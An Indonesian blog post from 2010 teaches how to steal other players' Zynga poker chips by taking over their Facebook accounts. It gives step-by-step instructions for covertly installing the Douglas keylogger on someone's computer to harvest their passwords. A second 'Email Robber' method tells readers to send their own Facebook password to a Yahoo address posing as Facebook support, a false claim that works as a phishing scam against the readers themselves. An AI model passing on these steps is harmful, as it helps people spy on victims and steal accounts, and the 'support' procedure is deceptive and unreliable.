Selamat datang di sudimampir.blogspot.com temukan hal hal yang UNIK , ASYIK dan MENARIK disini , ENJOY !!

Kamis, 18 November 2010

Cara mencuri Chips Poker paling canggih

Kita semua tahu bahwa game Zynga Texas Holdem Poker adalah salah satu game facebook yang paling banyak digemari oleh para facebooker di seluruh dunia. Dalam hal ini, Chips atau istilahnya uang virtual menjadi sangat penting, karena chips poker adalah alat pembayaran utama dalam permainan poker. Namun walaupun chips adalah uang virtual, ternyata chips bisa dijual belikan secra nyata di kalangan pecinta poker. Harganya sekitar Rp 10.000,- per 1.000.000 chips. Sehingga jangan heran jika banyak terjadi kasus pencurian chips.

Disini, saya akan memberikan trik bagaimana cara mencuri chips poker milik orang lain, sehingga anda bisa bermain poker dengan jutaan chips tanpa harus memenangkan banyak permainan ataupun membelinya di bandar chips.

Trik yang akan berikan ada 2 cara, cara pertama yaitu menggunakan Keylogger, dan cara kedua menggunakan emailrobber. Perhatikan dan pahami dengan baik cara yang akan saya berikan.

1. Cara Keylogger
Cara keylogger ini adalah mencuri chips poker dengan cara mencuri password facebook si target. Namun sayangnya, keylogger hanya bisa dipasang pada komputer, sehingga kita hanya bisa melihat password dan username korban yang memakai komputer yang sebelumnya sudah kita install keylogger.

Kalau ada yang belum tahu apa itu Keylogger, maka akan sedikit saya jelaskan. keylogger adalah software yang bisa merekam semua kegiatan komputer saat komputer dijalankan. Termasuk adalah merekan password yang digunakan selama komputer tersebut dijalankan.

http://img.brothersoft.com/screenshots/softimage/k/keylogger_douglas-53615-1231140950.jpeg

Password yang bisa diambil bukan hanya password akun situs lho, tapi juga password program komputer seperti Deep Freeze, Antivirus, dan lain-lain. Dan enaknya lagi, Cara penggunaan Keylogger ini sangatlah mudah. Hanya tinggal di install di kompuetr yang akan kita curi passwordnya, lalu kita bisa mencuri semua password yang terekam.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwy1BJDZ-htf869UDFaSz8JuBYStDsfo_fRtFOo4MRBBKsZASrHiEEFj-JvzQd3XJCi4NLt5W-4R1E5Z8KxCNRUlMWBXGjG07mg_TIjSNF4ETF8v_fsEqve4NcpYHSsvQ4AMJWQ50J7Ga2/s1600/4.JPG

Di sini saya akan sedikit mambagi tutorial singkat tentang cara mencuri password dengan Keylogger, dalam tutorial ini, saya menggunakan Keylogger versi Douglas yang bisa anda Download Disini
  • Pertama, silahkan DownloadSoftware Douglas Disini
  • Lalu setelah itu, Extract folder yang masih berbentuk Zip atau Rar tersebut dengan WinZip atau WinRar.
  • Nantinya akan ada 2 folder, Yaitu Douglas En dan Douglas Es. Pada dasarnya keduanya adalah sama, hanya berbeda bahasa saja, yaitu English dan Espana. Untuk lebih mudahnya, silahkan gunakan yang Douglas En.
  • Setelah itu, silahkan Install Douglas En. di tenagh-tengah proses instal, nanti kamu harus mengisi password yang akan digunakan sebagai password pembuka douglas. Password boleh anda isi sesuka hati. nantinya passwrd akan digunakan untuk membuka douglas.
  • Jika sudah, akan ada notifikasi "Instalation Succesfull"
  • mulai saat itulah Douglas akan merekam semua password yang tercatat dalam komputer.
  • Untuk melihat Password, silahkan buka program Douglas lalu pilih Read Info. masukan password pembuka dan Semua password sudah bisa dilihat.

2. Cara Email Robber
Cara yang kedua ini mungkin caranya agak halus. caranya adalah dengan mengakali tim facebook care indonesia. Caranya adalah dengan mencari password si target dengan dalih pelaporan kecurangan. Kita hanya perlu mengirimkan email pelaporan kita pada tim facebook care Indonesia.

A. Pertama, silahkan anda buka akun email anda.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHrQGwACYsmqWejIicMidTPt6rDqgTLLyIUy7rpXzFcVQ-vfpazrpvSS57FGrbzpd17Db2BPmLbxv2pfNQUWXI74LuKkAPiB8sTx-Jqw5FYn4QrrVYklPx6kKqTk0xROBX7FKYu9CXcvJ1/s1600/1.JPG
B. Setelah itu, silahkan klik Tulis untuk menulis pesan baru
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi03JYtlMCQsFIzjaPY-1SbttBnu_gSG1KPgUjD_C7khNSFCculWgmqNQd-O0dPvX7czgj1289fC0l1P71STGZMw1rqfff4vj493fU4AnyuXSrov69VxbbECISzxh-mLwXZOLuVlhTftp8q/s1600/2.JPG
C. Pada bagian tujuan, silahkan tuliskan alamat email tim customer facebook indonesia, yaitu id_facebookcare@yahoo.co.id (alamat email ini adalah alamat email customer facebook yang biasa menangani kasus cyber facebook di wilayah Indonesia)
D. Pada bagian cc, silahkan dikosongkan saja
E. Pada bagian Subject, silahkan tuliskan facebook retrieve (huruf kecil semua, jangan sampai salah)
F. Silahkan tuliskan pesanya dengan format seperti di bawah ini.
  • Baris pertama, isi dengan AUTOSER (spasi) alamat email anda
  • Baris kedua, isi dengan IDCARE (spasi) alamat email target yang akan dicuri chipsnya
  • Baris ketiga, isi dengan LOG (spasi) password facebook anda, ini untuk meyakinkan bahwa email yang anda gunakan adalah benar-benar milik anda.
  • Baris keempat, isi dengan kode berikut fb/autocare/indonesia (huruf kecil semua)
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-gYeomEOkAApVOr9sPYrze-bQgBv8oVOJNgGYHPEgTp5GFmIAmwABbnERYaQJYbNMiPMfOzj5sjWuudm9Qw1IKo7LKnyjQTTpjerPY5Io2PNALbJdp1UEHWIGLNxTZwP60PB8Cy3THpgf/s1600/3.JPG
G. Jika sudah, maka langsung kirim

NB : Email yang sudah kita kirimkan nantinya akan diperiksa oleh tim facebook akan mendapatkan balasan sekitar 10 menit. Balasan email yang kita terima adalah password facebook sementara si target yang bisa kita gunakan untuk login dan mencuri chips pokernya. Namun ini butuh keberuntungan, karena jika saat anda mengirimkan email dan kebetulan tim facebook sedang sibuk, maka biasanya balasanya akan butuh waktu sekitar 1-2 hari. Oleh karena itu saya sarankan untuk mengirimkan emailnya pada malam hari.

=====) Daftar Isi (=====